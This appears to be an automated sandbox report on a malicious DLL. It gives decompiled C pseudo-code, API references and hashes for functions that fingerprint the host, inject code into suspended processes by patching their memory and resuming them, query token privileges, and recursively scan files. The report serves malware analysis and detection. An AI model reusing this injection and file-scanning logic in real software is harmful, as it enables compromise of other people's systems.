0x1000b7cd
0x1000b7e0
0x1000b7ef
0x1000b7fa
0x1000b807
0x1000b821
0x1000b826
0x1000b828
0x1000b82f
0x1000b83f
0x1000b850
0x1000b85a
0x1000b862
0x1000b869
0x1000b86c
0x1000b889

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2da0590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x2e1faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x2e1faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x2e1faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x2e1faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x2e1faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x2e1faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

0x1000ca2b
0x1000ca34
0x1000ca37
0x1000ca39
0x1000ca3e
0x1000ca40
0x1000ca43
0x1000ca45
0x1000cb76
0x1000cb76
0x1000ca4b
0x1000ca5d
0x1000ca62
0x1000ca65
0x1000ca67
0x1000ca6c
0x1000cb63
0x1000cb69
0x00000000
0x1000cb72
0x1000ca72
0x1000ca7d
0x1000ca8a
0x1000ca8e
0x1000ca8f
0x1000ca90
0x1000ca94
0x1000ca99
0x1000ca9b
0x1000caa8
0x1000cab0
0x1000cabb
0x1000cac6
0x1000caca
0x1000cacc
0x1000cada
0x1000cae2
0x1000cae7
0x1000cae9
0x1000caee
0x1000caf4
0x1000caf6
0x1000caf6
0x1000caf7
0x1000caf7
0x1000cafd
0x1000cafd
0x1000caca
0x1000cab0
0x1000cb04
0x1000cb08
0x1000cb0a
0x1000cb13
0x1000cb13
0x1000cb19
0x1000cb21
0x1000cb24
0x1000cb2c
0x1000cb2c
0x1000cb32
0x1000cb35
0x1000cb36
0x1000cb3c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb3c
0x1000cb42
0x1000cb45
0x1000cb46
0x1000cb4b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb51
0x00000000
0x00000000
0x00000000
0x1000cb51
0x1000cb51
0x1000cb54
0x1000cb5a
0x1000cb5e

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000b99b
0x1000b99c
0x1000b9a3
0x1000b9ab
0x1000b9af
0x1000b9b8
0x1000b9fe
0x1000b9fe
0x1000b9c5
0x1000b9cd
0x1000b9cf
0x1000b9d5
0x1000b9ee
0x00000000
0x1000b9f0
0x1000b9f5
0x00000000
0x1000b9fb
0x1000b9d7
0x1000b9d7
0x1000b9d7
0x1000b9d7
0x1000b9d5
0x1000ba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

0x1000ccc6
0x1000ccc9
0x1000ccce
0x1000ccd1
0x1000ccd3
0x1000ccd3
0x1000ccd3
0x1000ccd6
0x1000ccd8
0x1000ccdf
0x1000cce7
0x1000ccea
0x1000ccf4
0x1000ccfa
0x1000ccfa
0x1000ccff
0x00000000
0x00000000
0x1000cd04
0x1000cd05
0x1000cd0c
0x00000000
0x00000000
0x1000cd0e
0x00000000
0x1000cd0c
0x1000cd13
0x1000cd13
0x1000cd15
0x1000cd15
0x1000cd16
0x1000cd19
0x1000cd19
0x1000cd1e
0x1000cd26
0x1000cd32

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x2e1fc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x2e1fc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x2e1fc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000ba69
0x1000ba6b
0x1000ba72
0x1000ba74
0x1000ba77
0x1000ba7c
0x1000ba81
0x1000ba8b
0x1000ba8e
0x1000ba91
0x1000ba96
0x1000ba98
0x1000ba9e
0x1000bafe
0x1000bb06
0x1000bb0c
0x1000bb13
0x1000bb19
0x00000000
0x1000bb1a
0x1000baa3
0x1000baa4
0x1000baa5
0x1000baa6
0x1000baa7
0x1000baa8
0x1000baa9
0x1000baaa
0x1000baaf
0x1000bab1
0x1000bab6
0x1000bab7
0x1000bac1
0x00000000
0x00000000
0x1000bac5
0x1000baf1
0x1000baf1
0x1000baf9
0x1000bafc
0x00000000
0x1000bafc
0x1000bac7
0x1000bac7
0x1000baca
0x1000bacd
0x1000bacd
0x1000bad0
0x1000bad2
0x1000badc
0x00000000
0x00000000
0x1000bae1
0x1000bae2
0x1000bae5
0x1000baea
0x00000000
0x00000000
0x00000000
0x1000baec
0x1000baf0
0x00000000
0x1000baf0
0x1000bb1f

APIs

Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980

Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
String ID:
API String ID: 3752664914-0
Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d530
0x1000d533
0x1000d536
0x1000d547
0x1000d54d
0x1000d55e
0x1000d566
0x1000d5b7
0x1000d5b7
0x1000d5bc
0x1000d5c1
0x1000d5c1
0x1000d5c4
0x1000d5c9
0x1000d5ce
0x1000d5ce
0x1000d5d1
0x1000d568
0x1000d569
0x1000d56f
0x1000d580
0x1000d585
0x00000000
0x1000d587
0x1000d594
0x1000d59c
0x00000000
0x1000d59e
0x1000d5a0
0x1000d5a8
0x00000000
0x1000d5aa
0x1000d5ad
0x1000d5b3
0x1000d5b3
0x1000d5a8
0x1000d59c
0x1000d585
0x1000d5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 1000AEB4, Relevance: 3.1, APIs: 2, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092E5(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E1000861A( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092E5(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x2e1faa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
								_t65 = _t65 + 0x1c;
								E1000861A( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x2e1fd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x2e1faa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
